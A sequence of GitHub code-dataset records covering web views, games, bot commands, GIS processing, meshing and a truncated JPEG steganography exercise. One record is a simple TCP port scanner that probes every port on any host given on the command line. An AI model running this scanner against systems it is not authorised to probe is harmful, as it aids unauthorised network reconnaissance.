user):\n        join_request.status = status\n        join_request.last_modified_by = user\n        join_request.last_modified = datetime.now()\n        join_request.save()\n","repo_name":"First-Peoples-Cultural-Council/fv-be","sub_path":"firstvoices/backend/views/join_request_views.py","file_name":"join_request_views.py","file_ext":"py","file_size_in_byte":10337,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"}
+{"seq_id":"24962315974","text":"import socket\nimport pyfiglet\nimport sys\nfrom datetime import datetime\n\nascii_banner = pyfiglet.figlet_format(\"PORT SCANNER\")\nprint(ascii_banner)\n\n\nif len(sys.argv) == 2:\n    target = socket.gethostbyname(sys.argv[1])\nelse:\n    print(\"Invalid amount of arguments!\")\n\nprint(\"-\" * 50)\nprint(f\"Scanning target: {target}\")\nprint(f\"Scanning target at: {str(datetime.now())}\")\nprint(\"-\" * 50)\n\ntry:\n    for port in range(1, 65535):\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        socket.setdefaulttimeout(1)\n\n        result = s.connect_ex((target, port))\n        if result == 0:\n            print(f\"Port {port} is open.\")\n        s.close()\nexcept KeyboardInterrupt:\n    print(\"\\nExiting program.\")\n    sys.exit()\nexcept socket.gaierror:\n    print(\"\\nHostname could not be resolved.\")\n    sys.exit()\nexcept socket.error:\n    print(\"\\nServer not responding.\")\n    sys.exit()\n","repo_name":"andref50/console-chat","sub_path":"utils/port_scanner.py","file_name":"port_scanner.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"33922375010","text":"import os\n\nfrom loguru import logger\nfrom aio_binance.futures.usdt import Client\nfrom unicorn_binance_rest_api import BinanceRestApiManager\nfrom unicorn_binance_websocket_api import BinanceWebSocketApiManager\n\nBINANCE_API_CLIENT = BinanceRestApiManager(exchange=\"binance.com-futures\")\nAIO_BINANCE_API_CLIENT = Client(show_limit_usage=True)\nBINANCE_WEBSOCKET_MANAGER = BinanceWebSocketApiManager(exchange=\"binance.com-futures\")\nKLINES_DATA = {}\n\nFIRST_KLINE_STREAM_ID = \"\"\nSECOND_KLINE_STREAM_ID = \"\"\n\nlog_folder = \"./logs\"\nos.makedirs(log_folder, exist_ok=True)\n\nlogger.add(f\"{log_folder}/file_{{time:DD-MM}}_{{time:HH-mm}}.log\", rotation=\"100 MB\", retention=\"1 day\",\n encoding='utf-8')\n\n__all__ = [\n 'BINANCE_API_CLIENT', 'BINANCE_WEBSOCKET_MANAGER',\n 'FIRST_KLINE_STREAM_ID', 'SECOND_KLINE_STREAM_ID',\n 'KLINES_DATA', 'AIO_BINANCE_API_CLIENT',\n]","repo_name":"nastiakostenyuk/alert_server_v1","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"36751184486","text":"import sys\r\nimport pygame\r\nfrom bullet import Bullet\r\nfrom alien import Alien\r\nfrom time import sleep\r\nimport random\r\n\r\n\r\n# key press response functions\r\ndef check_keydown_events(event, ai_settings, screen, ship, bullets):\r\n    if event.key == pygame.K_RIGHT:\r\n        ship.moving_right = True\r\n    elif event.key == pygame.K_LEFT:\r\n        ship.moving_left = True\r\n    elif event.key == pygame.K_SPACE:\r\n        fire_bullets(ai_settings, screen, ship, bullets)\r\n    elif event.key == pygame.K_q:\r\n        sys.exit() # quick exit\r\n\r\n\r\ndef check_keyup_events(event, ship):\r\n    if event.key == pygame.K_RIGHT:\r\n        ship.moving_right = False\r\n    elif event.key == pygame.K_LEFT:\r\n        ship.moving_left = False\r\n\r\n\r\ndef check_events(ai_settings, screen, ship, bullets):\r\n    for event in pygame.event.get():\r\n        # listen for keyboard and mouse events\r\n        if event.type == pygame.QUIT:\r\n            sys.exit()\r\n        elif event.type == pygame.KEYDOWN: # directional movement\r\n            check_keydown_events(event, ai_settings, screen, ship, bullets)\r\n        elif event.type == pygame.KEYUP:\r\n            check_keyup_events(event, ship)\r\n\r\n\r\ndef update_screen(ai_settings, screen, ship, aliens, bullets):\r\n    screen.fill(ai_settings.bg_color) # redraw the screen on each pass through the loop\r\n    for bullet in bullets: # redraw each bullet\r\n        bullet.draw_bullet()\r\n    ship.blitme() # redraw the ship on each pass through the loop\r\n    aliens.draw(screen)\r\n    pygame.display.flip() # make the newly drawn screen visible\r\n\r\n\r\ndef update_bullets(aliens, bullets):\r\n    bullets.update()\r\n    # delete old bullets\r\n    for bullet in bullets.copy():\r\n        if bullet.rect.bottom <= 0:\r\n            bullets.remove(bullet)\r\n    pygame.sprite.groupcollide(bullets, aliens, True, True)\r\n\r\n\r\ndef fire_bullets(ai_settings, screen, ship, bullets):\r\n    # limit the number of bullets allowed on screen\r\n    if len(bullets) < ai_settings.bullets_allowed:\r\n        # create a new bullet\r\n        new_bullet = Bullet(ai_settings, screen, ship)\r\n        bullets.add(new_bullet)\r\n\r\n\r\ndef check_alien_num(ai_settings, screen, ship, aliens, bullets):\r\n    if len(aliens) == 0:\r\n        # if the whole fleet is destroyed, create a new fleet\r\n        bullets.empty()\r\n        create_fleet(ai_settings, screen, ship, aliens)\r\n\r\n\r\ndef create_fleet(ai_settings, screen, ship, aliens):\r\n    alien = Alien(ai_settings, screen)\r\n    alien_width = alien.rect.width\r\n    number_aliens_x = get_number_aliens_x(ai_settings, alien_width)\r\n    number_rows = get_number_rows(ai_settings, ship.rect.height, alien.rect.height)\r\n\r\n    for row_number in range(number_rows):\r\n        for alien_number in range(number_aliens_x):\r\n            if random.random() >= 0.5:\r\n                create_alien(ai_settings, screen, aliens, alien_number, alien_width, row_number)\r\n\r\n\r\ndef get_number_aliens_x(ai_settings, alien_width):\r\n    # compute the horizontal space available for a row of aliens\r\n    available_space_x = ai_settings.screen_width - 2 * alien_width\r\n    # compute the number of aliens that fit in a row\r\n    number_aliens_x = int(available_space_x / (1.5 * alien_width))\r\n    return number_aliens_x\r\n\r\n\r\ndef create_alien(ai_settings, screen, aliens, alien_number, alien_width, row_number):\r\n    alien = Alien(ai_settings, screen)\r\n    alien.x = alien_width + 1.5 * alien_width * alien_number\r\n    alien.rect.x = alien.x\r\n    alien.y = alien.rect.height / 2 + 1.5 * alien.rect.height * row_number\r\n    alien.rect.y = alien.y\r\n    aliens.add(alien)\r\n\r\n\r\n# compute how many rows of aliens fit on the screen\r\ndef get_number_rows(ai_settings, ship_height, alien_height):\r\n    available_space_y = ai_settings.screen_height - (4.5 * alien_height) - ship_height\r\n    number_rows = int(available_space_y / (1.5 * alien_height))\r\n    return number_rows\r\n\r\n\r\ndef update_aliens(ai_settings, stats, screen, ship, aliens, bullets):\r\n    for alien in aliens.sprites():\r\n        alien.y += ai_settings.fleet_drop_speed\r\n        alien.rect.y = alien.y\r\n    if pygame.sprite.spritecollideany(ship, aliens):\r\n        ship_hit(ai_settings, stats, screen, ship, aliens, bullets)\r\n    check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets)\r\n    check_alien_num(ai_settings, screen, ship, aliens, bullets)\r\n    check_fleet_edges(ai_settings, aliens)\r\n    aliens.update()\r\n    # updating the group updates each alien in it\r\n    # check for collisions between aliens and the ship\r\n\r\n\r\ndef check_fleet_edges(ai_settings, aliens):\r\n    for alien in aliens.sprites():\r\n        if alien.check_edges():\r\n            ai_settings.fleet_direction *= -1\r\n            break\r\n\r\n\r\ndef ship_hit(ai_settings, stats, screen, ship, aliens, bullets):\r\n    if stats.ship_left > 0:\r\n        stats.ship_left -= 1\r\n        aliens.empty()\r\n        bullets.empty()\r\n        # rebuild the ship\r\n        ship.center_ship()\r\n        sleep(0.5)\r\n    else:\r\n        stats.game_active = False\r\n\r\n\r\ndef check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets):\r\n    screen_rect = screen.get_rect()\r\n    for alien in aliens.sprites():\r\n        if alien.rect.bottom >= screen_rect.bottom:\r\n            aliens.remove(alien)\r\n\r\n\r\n\r\n","repo_name":"cuuuute/Alien-Gaming","sub_path":"Alien_Gaming_1107/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":5075,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"74038898669","text":"from twisted.internet.endpoints import TCP4ServerEndpoint\nfrom twisted.internet import reactor\nfrom MessageManagers.MessageDispatcher import MessageDispatcherFactory\nfrom MessageManagers.SendMessage import MessageSenderFactory\nfrom CommandMessageGenerators.MessageGenerator import StringMessageGenerator\nfrom CommandMessageGenerators.MessageRepeat import MsgMonitor\nfrom CommandMessageGenerators.ExpMessageGenerator import ReceiveExpNode\nfrom Utilities.Const import *\nfrom Utilities.FileInputTokenize import ArgFIP\nfrom Utilities.FileUtil import expprint, setFileName, OUTFOLDER, getDFilePath, getPFilePath\nimport threading\nimport time\nimport sys\nimport os\nimport uuid\n\nclass outgoer():\n    def __init__(self, ip, port, fact):\n        self.ip = ip\n        self.port = port\n        self.fact = fact\n\n    def call(self):\n        reactor.connectTCP(self.ip, self.port, self.fact)\n\nclass PlatformManager():\n    def __init__(self, in_my_IP, in_my_Port, location):\n        self.IP = in_my_IP\n        self.Port = in_my_Port\n        self.reactorFileConfirmers = []\n        self.msgmon = MsgMonitor()\n        self.idval = str(uuid.uuid4())\n        setFileName(self.idval)\n        self.templogfilenames = []\n        self.location = location\n\n    def ManagerThreadRun(self):\n        dbgprint("bad way")\n        raise NotImplementedError("Abstract method")\n\n    def StartAll(self):\n        self.StartServer()\n        self.StartManager()\n    def StartServer(self):\n        #from Utilities.Const import * ##\n        self.serverThread = threading.Thread(target=self.ServerThreadRun)\n        self.serverThread.start()\n    def StartManager(self):\n        #from Utilities.Const import * ##\n        dbgprint("starting mngr")\n        self.managerThread = threading.Thread(target=self.ManagerThreadRun)\n        self.managerThread.start()\n\n    def SafeStopServer(self):\n        dbgprint("SafeStopCalled")\n        reactor.callFromThread(reactor.stop)\n        self.msgmon.terminate()\n\n    def ServerThreadRun(self):\n\n        endpoint = TCP4ServerEndpoint(reactor, self.Port)\n        endpoint.listen(MessageDispatcherFactory(self))\n        dbgprint("server starting...")\n        reactor.run(installSignalHandlers=0)\n\n    def ReactorReceiverAdd(self, filerec):\n        dbgprint("added filerec")\n        self.reactorFileConfirmers.append(filerec)\n\n    def ReactorFileSent(self, filename, transp):\n        dbgprint("Reactor File Sent")\n        self.reactorFileConfirmers[:] = [x for x in self.reactorFileConfirmers if x.FileResponded(filename, transp)]\n\n    def storeLog(self, vals):\n        afilename = str(uuid.uuid4())\n        v = vals.replace("\\t", "\\n")\n        if(afilename in self.templogfilenames):\n            expprint("BADFILENAME!!")\n        self.templogfilenames.append(afilename)\n        with open(afilename, 'w') as afile:\n            afile.write(v)\n\n    def compilelogs(self):\n        expprint("Compiling " + str(len(self.templogfilenames)) + " logs\\n")\n        for filename in self.templogfilenames:\n            if(self.templogfilenames.count(filename) > 1):\n                expprint("found dup\\n")\n        for filename in self.templogfilenames:\n            with open(filename, 'r') as afile:\n                for line in afile:\n                    expprint(line +"\\n")\n            os.remove(filename)\n        dbgprint("Logs Compiled To "+OUTFOLDER+str(self.idval))\n\n    def dumpLogToStdOut(self):\n        filename = OUTFOLDER+"/"+str(self.idval)\n        with open(filename, 'r') as afile:\n            for line in afile:\n                print(line + "\\n") ##\n\n    def getPFileName(self):\n        return getPFilePath()\n\n    def getDFileName(self):\n        return getDFilePath()\n","repo_name":"Shifat11420/CloudPlatform","sub_path":"Platformv5/Platform/PlatformManager.py","file_name":"PlatformManager.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
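The `storeLog`/`compilelogs` methods above write each log chunk to its own uuid-named temp file and later concatenate and delete them (which is why the module needs `import os`). A self-contained sketch of that pattern, with illustrative paths rather than the repo's real layout:

```python
import os
import uuid

# Each chunk goes to its own uuid-named file; compile_logs then
# concatenates all chunks and removes the temp files, mirroring
# storeLog/compilelogs above.
def store_log(text, filenames):
    name = str(uuid.uuid4())
    filenames.append(name)
    with open(name, "w") as f:
        f.write(text.replace("\t", "\n"))

def compile_logs(filenames, out_path):
    with open(out_path, "w") as out:
        for name in filenames:
            with open(name) as f:
                out.write(f.read() + "\n")
            os.remove(name)   # this call is why `import os` is required

names = []
store_log("a\tb", names)
store_log("c", names)
compile_logs(names, "combined.log")
print(open("combined.log").read())
```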
+{"seq_id":"21112038120","text":"import requests\r\nfrom collections import defaultdict\r\n\r\n# loadData: takes a URL and headers parameters for getting info from the URL endpoint\r\n# parameter URL: this is the endpoint where the data is located in JSON format\r\n# parameter headers: there is no need for headers to access this data, so it will be empty\r\ndef loadData(URL,header) :\r\n    # making the info request to the endPoint\r\n    URLrequest=requests.get(URL,headers=header)\r\n    # storing the information in the \"result\" variable\r\n    result=URLrequest.json()\r\n    return result\r\n# takes the height input from the console\r\ndef getInput():\r\n    while True:\r\n        try :\r\n            result = int(input(\"Introduce height in inches adds up to:\"))\r\n            break\r\n        except ValueError:\r\n            print(\"Please introduce a number\")\r\n    return result\r\n\r\n# parameters:\r\n# data: Dictionary with players Info\r\n# totalHeight: the total height of the players' pair\r\ndef createHeightDictionary(data, totalHeight):\r\n    # create an empty dictionary keyed by height\r\n    dictPairs = defaultdict(list)\r\n    print(type(dictPairs))\r\n    for player in data:\r\n        try:\r\n            # takes playerHeight of each player record and validates data quality\r\n            playerHeight = int(player['h_in'])\r\n        except ValueError:\r\n            print(\"Height is not an integer value on player:\" + player['first_name'] + \" \" + player['last_name'])\r\n            # skip records whose height cannot be parsed\r\n            continue\r\n\r\n        # add player to the dictionary\r\n        dictPairs[playerHeight].append(player['first_name'] + \" \" + player['last_name'])\r\n        # print(dictPairs)\r\n\r\n    return dictPairs\r\n# program starting point\r\ntotalHeight = getInput()\r\n \r\n# url hardcoded\r\nurl='https://mach-eight.uc.r.appspot.com'\r\n# load data into the result variable (as a dictionary) from the url\r\nDataresult=loadData(url,{})\r\nprint(type(Dataresult))\r\nfor data in Dataresult['values'] :\r\n    print(data)\t\t\r\n\r\nplayersHeight = createHeightDictionary(Dataresult['values'],totalHeight)\r\nprint(playersHeight)\r\n# search for pairs by checking each height against the complementary height\r\nprint(\"The pairs of basketball players that added up:[\"+ str(totalHeight)+\"] inches are:\")\r\nfor height in playersHeight:\r\n    # print(height)\r\n    if totalHeight - height in playersHeight:\r\n        for otherPlayer in playersHeight[totalHeight - height] :\r\n            for player in playersHeight[height]:\r\n                #print(\"player:\"+player)\r\n                if player < otherPlayer:\r\n                    print(\"[\"+player + \" - \" + otherPlayer+\"]\")\r\n    ","repo_name":"jriosfer/Playerspairs","sub_path":"getPairs.py","file_name":"getPairs.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
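The pairing logic in the record above is the classic complement lookup: group players by height once, then for each height `h` check whether `target - h` exists in the same dictionary. A compact, self-contained sketch with toy data:

```python
from collections import defaultdict

# Complement-lookup sketch of the pairing logic above, on sample data.
def pairs_adding_to(players, target):
    by_height = defaultdict(list)
    for name, h in players:
        by_height[h].append(name)
    out = []
    for h, names in by_height.items():
        rest = target - h
        if rest in by_height:
            for a in names:
                for b in by_height[rest]:
                    if a < b:          # emit each unordered pair once
                        out.append((a, b))
    return out

players = [("Ann", 70), ("Bob", 69), ("Cid", 70), ("Dee", 69)]
print(pairs_adding_to(players, 139))
# [('Ann', 'Bob'), ('Ann', 'Dee'), ('Cid', 'Dee'), ('Bob', 'Cid')]
```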
+{"seq_id":"33882337144","text":"from aiogram.types import BotCommand\n\nBOT_COMMAND_LIST = (\n (\"start\", \"Запустить бота\"),\n (\"suggest\", \"Предложить пароль\"),\n (\"logout\", \"Выйти\"),\n (\"help\", \"Помощь\"),\n (\"about\", \"О боте\"),\n)\n\nBOT_COMMANDS = [\n BotCommand(command=name, description=desc) for name, desc in BOT_COMMAND_LIST\n]\n\nBOT_COMMANDS_STR = \"\\n\".join(\"/\" + (\" - \".join(cmd)) for cmd in BOT_COMMAND_LIST)\n","repo_name":"everysoftware/secrets","sub_path":"bot/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
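The record above keeps one tuple list as the single source of truth and derives both the Telegram command menu and the help string from it. The same pattern works without aiogram; the `Command` dataclass below is a hypothetical stand-in for aiogram's `BotCommand`:

```python
from dataclasses import dataclass

# One source-of-truth tuple list, two derived structures — mirroring
# BOT_COMMANDS and BOT_COMMANDS_STR above. Command stands in for
# aiogram.types.BotCommand.
@dataclass
class Command:
    command: str
    description: str

COMMAND_LIST = (
    ("start", "Start the bot"),
    ("help", "Show help"),
)

COMMANDS = [Command(command=n, description=d) for n, d in COMMAND_LIST]
COMMANDS_STR = "\n".join("/" + " - ".join(cmd) for cmd in COMMAND_LIST)

print(COMMANDS)
print(COMMANDS_STR)   # /start - Start the bot ...
```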
+{"seq_id":"40316526464","text":"# declare a dictionary\nd={'과목1':'자료구조','과목2':'컴논개'}\n\n# insertion\nd['과목3']='데이터구조'\nd['과목4']='컴개실'\nprint(d)\n\n# examples of using the ADT\nGet=d.get('과목1')\nShow=d.values()\nKeysList=list(d.keys())\nValuesList=list(d.values())\nTuple_d=d.items()\nprint(f' Get={Get} \\n Show={Show} \\n KeysList={KeysList} \\n ValuesList={ValuesList} \\n Tuple_d={Tuple_d}')\n\nprint()\n# declare a set\ns={0,1,2}\n\ns.add(4)\ns.update([10,6])\ns.remove(0)\nlength=len(s)\n\nt={0,1,2,20}\nUnion=s.union(t)\nIntersection=s.intersection(t)\nDifference=s.difference(t)\n\nprint(f'Set : {s} \\nUnion : {Union} \\nIntersection : {Intersection} \\nDifference : {Difference}')\n\n\n# comprehension\na = []\nfor x in range(31):\n    if x % 3 ==0:\n        a.append(x)\n\n# a = [x for x in range(31) if x % 3 == 0]\n\n\ndef add(*args):\n    sum=0\n    for x in args:\n        sum+=x\n    return sum\nprint(add(3,4,5,6))\n\n\ndef say_myself(name, old, man=True):\n    print(\"My name is %s.\" %name)\n    print(\"I am %d years old.\" %old)\n    if man:\n        print(\"I am a man.\")\n    else:\n        print(\"I am a woman.\")\n\n\ndef increase1(x):\n    x +=1\n\nx=10\nincrease1(x)\nprint(x)\n\ns=[]\ns.append(3)\ns.extend('4')\ns.extend({5:6, 7:8})\nprint(s)\n\naa=s.copy()\nprint(aa,\"\\n\")\nstring= \"hello world\"\ntu=(1,2,3,4)\nprint(max(string))\nprint(max(tu))","repo_name":"Againyunn/Python-Study","sub_path":"DataStructure/수업내용/PythonReview/자료형 연습.py","file_name":"자료형 연습.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"15277613728","text":"#!/usr/bin/env python\n\n# inst: university of bristol\n# auth: jeison sosa\n# mail: j.sosa@bristol.ac.uk / sosa.jeison@gmail.com\n\nfrom sys import exit\nimport subprocess\nimport numpy as np\nimport gdalutils as gu\n\nos = 'osx'\nvoid_demf = 'lidar_england_50m.tif'\nfill_demf = 'OS_terrain_50.tif'\nnodata = -9999 # non data value in both datasets\n\n# Calculate delta surface with voids\ndef step_01():\n\n geo = gu.get_geo(void_demf)\n void_dem = gu.get_data(void_demf)\n fill_dem = gu.get_data(fill_demf)\n delta_surf = void_dem - fill_dem\n\n delta_surf[(delta_surf>=8000) | (delta_surf<=-8000)] = nodata\n delta_surf[delta_surf==0] = nodata\n\n gu.write_raster(delta_surf,'delta_surf_wt_voids.tif',geo,'Float64',nodata)\n\n# Create list of source points to interpolate\ndef step_02():\n\n subprocess.call(['gdal_translate','-of','XYZ','delta_surf_wt_voids.tif','delta_surf_wt_voids.xyz'])\n subprocess.call(['sed','s/ /,/g','delta_surf_wt_voids.xyz'],stdout=open('delta_surf_wt_voids.csv','w'))\n if os == 'osx':\n subprocess.call(['sed','-i','','/-9999/d','delta_surf_wt_voids.csv'])\n elif os == 'linux':\n subprocess.call(['sed','-i','/-9999/d','delta_surf_wt_voids.csv'])\n else:\n print('OS not identified')\n exit(0)\n\n f = open('delta_surf_wt_voids.vrt','w')\n f.write(''+'\\n')\n f.write(' '+'\\n')\n f.write(' delta_surf_wt_voids.csv '+'\\n')\n f.write(' wkbPoint '+'\\n')\n f.write(' '+'\\n')\n f.write(' '+'\\n')\n f.write(' '+'\\n')\n f.close()\n\n# Interpolation\ndef step_03():\n\n geo = gu.get_geo(void_demf)\n nx = geo[4]\n ny = geo[5]\n xmin = geo[0]\n xmax = geo[2]\n ymin = geo[1]\n ymax = geo[3]\n\n subprocess.call(['gdal_grid','--config','GDAL_NUM_THREADS','ALL_CPUS',\n '-a','invdist',\n '-of','GTiff',\n '-ot','Float64',\n '-txe', str(xmin), str(xmax),\n '-tye', str(ymin), str(ymax),\n '-outsize', str(nx), str(ny),\n '-l','delta_surf_wt_voids',\n 'delta_surf_wt_voids.vrt','delta_surf_interp.tif'])\n\n# Get final raster\ndef step_04():\n\n A = gu.get_data('delta_surf_interp.tif')\n B = gu.get_data(fill_demf)\n C = gu.get_data(void_demf)\n geo = gu.get_geo(void_demf)\n mysum = A+B\n final = np.where(C==nodata,mysum,C)\n \n final[(final>=8000) | (final<=-8000)] = nodata\n gu.write_raster(final,'dem.tif',geo,'Float64',nodata)\n\n# Running the program\ndef main():\n step_01()\n step_02()\n step_03()\n step_04()\nmain()\n","repo_name":"jsosa/delta_surf_method","sub_path":"delta_surface_method.py","file_name":"delta_surface_method.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
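The script above fills LiDAR voids by interpolating a delta surface (void DEM minus fill DEM) and adding it back to the coarse grid. Here is a toy numpy sketch of the same idea without GDAL, using a naive inverse-distance weighting in place of `gdal_grid`'s `invdist` algorithm:

```python
import numpy as np

# Toy delta-surface fill: compute void - fill where both grids are valid,
# IDW-interpolate the delta into void cells, then add it back to the fill
# grid. The -9999 flag mirrors the script's nodata convention.
nodata = -9999.0
void_dem = np.array([[10.0, 11.0, nodata],
                     [12.0, nodata, 14.0],
                     [13.0, 14.0, 15.0]])
fill_dem = np.array([[9.0, 10.0, 12.0],
                     [11.0, 12.0, 13.0],
                     [12.0, 13.0, 14.0]])

valid = void_dem != nodata
delta = np.where(valid, void_dem - fill_dem, nodata)

src = np.argwhere(valid)       # cells with a known delta
dst = np.argwhere(~valid)      # void cells to estimate
out = void_dem.copy()
for r, c in dst:
    d = np.linalg.norm(src - np.array([r, c]), axis=1)
    w = 1.0 / d**2                              # inverse-distance weights
    est = np.sum(w * delta[valid]) / np.sum(w)  # weighted mean delta
    out[r, c] = fill_dem[r, c] + est            # add the delta back
print(out)
```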
+{"seq_id":"17533590366","text":"from classy_blocks.construct import edges\nfrom classy_blocks.construct.flat.face import Face\nfrom classy_blocks.construct.operations.loft import Loft\nfrom classy_blocks.types import VectorType\n\n\nclass Revolve(Loft):\n \"\"\"Takes a Face and revolves it by angle around axis;\n axis can be translated so that it goes through desired origin.\n\n Angle is given in radians,\n revolve is in positive sense (counter-clockwise - right hand rule)\"\"\"\n\n def __init__(self, base: Face, angle: float, axis: VectorType, origin: VectorType):\n self.base = base\n self.angle = angle\n self.axis = axis\n self.origin = origin\n\n bottom_face = base\n top_face = base.copy().rotate(angle, axis, origin)\n\n super().__init__(bottom_face, top_face)\n\n # there are 4 side edges: the simplest is to use 'axis and angle'\n for i in range(4):\n self.add_side_edge(i, edges.Angle(self.angle, self.axis))\n","repo_name":"damogranlabs/classy_blocks","sub_path":"src/classy_blocks/construct/operations/revolve.py","file_name":"revolve.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"38"}
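`Revolve` above builds its top face by rotating a copy of the base face around an axis through an origin. The rotation itself is standard Rodrigues' formula; a self-contained numpy sketch of that step (not classy_blocks' actual implementation):

```python
import numpy as np

# Rotate points by `angle` around `axis` through `origin` (right-hand
# rule), via Rodrigues' rotation formula:
#   v' = v cos(t) + (k x v) sin(t) + k (k . v)(1 - cos(t))
def rotate(points, angle, axis, origin):
    k = np.asarray(axis, dtype=float)
    k /= np.linalg.norm(k)
    p = np.asarray(points, dtype=float) - origin
    cos, sin = np.cos(angle), np.sin(angle)
    rotated = p * cos + np.cross(k, p) * sin + np.outer(p @ k, k) * (1 - cos)
    return rotated + origin

square = [[1, 0, 0], [2, 0, 0], [2, 0, 1], [1, 0, 1]]
top = rotate(square, np.pi / 2, axis=[0, 0, 1], origin=[0, 0, 0])
print(np.round(top, 6))   # the face swung 90 degrees CCW about z
```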
+{"seq_id":"71622050671","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 25 14:34:05 2021\n\n@author: tjoeun\n\"\"\"\ndef fibo_print(n):\n    'print the Fibonacci sequence below n'\n    for i in fibo_return(n):\n        print(i, end=' ')\n    print()\n\n\ndef fibo_return(n):\n    'return the Fibonacci sequence below n as a list'\n    result = []\n    a,b=0,1\n    while(a < n):\n        result.append(a)\n        a, b = b, a + b\n    return result\n\n\nimport struct\nimport numpy as np\nfrom PIL import Image\nfrom bitarray import bitarray\nimport constants\n\n\ndef get_header(img_height, img_width, quant_table):\n    buf = bytearray()\n\n    def writebyte(val):\n        buf.extend(struct.pack(\">B\", val))\n\n    def writeshort(val):\n        buf.extend(struct.pack(\">H\", val))\n\n    # SOI\n    writeshort(0xFFD8) # SOI marker\n\n    # APP0\n    writeshort(0xFFE0) # APP0 marker\n    writeshort(0x0010) # segment length\n    writebyte(0x4A) # 'J'\n    writebyte(0x46) # 'F'\n    writebyte(0x49) # 'I'\n    writebyte(0x46) # 'F'\n    writebyte(0x00) # '\\\0'\n    writeshort(0x0101) # v1.1\n    writebyte(0x00) # no density unit\n    writeshort(0x0001) # X density = 1\n    writeshort(0x0001) # Y density = 1\n    writebyte(0x00) # thumbnail width = 0\n    writebyte(0x00) # thumbnail height = 0\n\n    # DQT\n    quant_table = quant_table.reshape(-1)\n    writeshort(0xFFDB) # DQT marker\n    writeshort(0x0043) # segment length\n    writebyte(0x00) # table 0, 8-bit precision (0)\n    for index in constants.zz:\n        writebyte(quant_table[index])\n\n    # SOF0\n    writeshort(0xFFC0) # SOF0 marker\n    writeshort(0x000B) # segment length\n    writebyte(0x08) # 8-bit precision\n    writeshort(img_height)\n    writeshort(img_width)\n    writebyte(0x01) # 1 component only (grayscale)\n    writebyte(0x01) # component ID = 1\n    writebyte(0x11) # no subsampling\n    writebyte(0x00) # quantization table 0\n\n    # DHT\n    writeshort(0xFFC4) # DHT marker\n    writeshort(19 + constants.dc_nb_vals) # segment length\n    writebyte(0x00) # table 0 (DC), type 0 (0 = Y, 1 = UV)\n    for node in constants.dc_nodes[1:]:\n        writebyte(node)\n    for val in constants.dc_vals:\n        writebyte(val)\n\n    writeshort(0xFFC4) # DHT marker\n    writeshort(19 + constants.ac_nb_vals)\n    writebyte(0x10) # table 1 (AC), type 0 (0 = Y, 1 = UV)\n    for node in constants.ac_nodes[1:]:\n        writebyte(node)\n    for val in constants.ac_vals:\n        writebyte(val)\n\n    # SOS\n    writeshort(0xFFDA) # SOS marker\n    writeshort(8) # segment length\n    writebyte(0x01) # nb. components\n    writebyte(0x01) # Y component ID\n    writebyte(0x00) # Y HT = 0\n    # segment end\n    writebyte(0x00)\n    writebyte(0x3F)\n    writebyte(0x00)\n\n    return buf\n\ndef embed(msg_file, cover_img_file, quant_table, stego_img_file):\n    '''\n    Embed a secret message into a (lossy) JPEG image with the LSB method, k = 1\n    (see the slide file \"07-AnTinMatTrenAnh3.pdf\", page 13).\n    For simplicity, we assume here that the image is grayscale\n    and that its width and height are divisible by 8.\n    \n    Parameters:\n        msg_file (str): name of the file holding the secret message.\n        cover_img_file (str): name of the file holding the cover image.\n        quant_table (8x8 numpy array): the quantization table (the divisors used in the quantization step).\n        stego_img_file (str): name of the (*.jpg) file for the stego image (the result of the embedding).\n    Returns:\n        bool: True if the embedding succeeded, False if there is not enough room to embed.\n    '''\n    # I. Read the cover image file\n    # YOUR CODE HERE\n\n    cover_img = Image.open(cover_img_file)\n    cover_pixels = np.array(cover_img,dtype=int)\n    width, height = cover_img.size\n    max_bits_per_block = 26\n    \n    \n    # II. Read the msg file, turn msg into msg bits, check there is room to embed, append 100... to the msg bits\n    # YOUR CODE HERE\n    \n    # Read the msg file\n    with open(msg_file, 'r') as f:\n        msg = f.read()\n    msg_bits = bitarray()\n    msg_bits.frombytes(msg.encode('utf-8'))\n    \n    # Check whether the message fits\n    capacity = max_bits_per_block*(cover_pixels.size//64)\n    if len(msg_bits) + 1 > capacity:\n        return False\n\n    # Append '100...' to the msg bits\n    msg_bits.extend('1' + '0' * (capacity - len(msg_bits) - 1))\n\n    # III. JPEG compression; embed the msg bits during the compression\n    jpeg_bytes = bytearray()\n    jpeg_bytes.extend(get_header(height, width, quant_table))\n    huf = Huffman()\n    \n    # Visit the 8x8 image blocks in turn (left to right, top to bottom)\n    # For each block:\n    # (1) Subtract 128, then compute the DCT coefficients\n    # (2) Compute the quantized DCT coefficients\n    # (3) Embed msg bits into the quantized DCT coefficients\n    # (4) Compress the quantized DCT coefficients with Huffman coding\n    #     To compress, call `huf.encode_block(quant_dct_coefs, length)`\n    #     where:\n    #     - `quant_dct_coefs` is the 1-D array of quantized DCT coefficients\n    #       (obtained by walking the 2-D array in zig-zag order:\n    #       first flatten the 2-D array into a 1-D array,\n    #       then index that 1-D array with the predefined index array `constants.zz`)\n    #     - `length` is the number of elements of `quant_dct_coefs`\n    #       counted from the first element up to the last non-zero element\n    #       (note: it can happen that 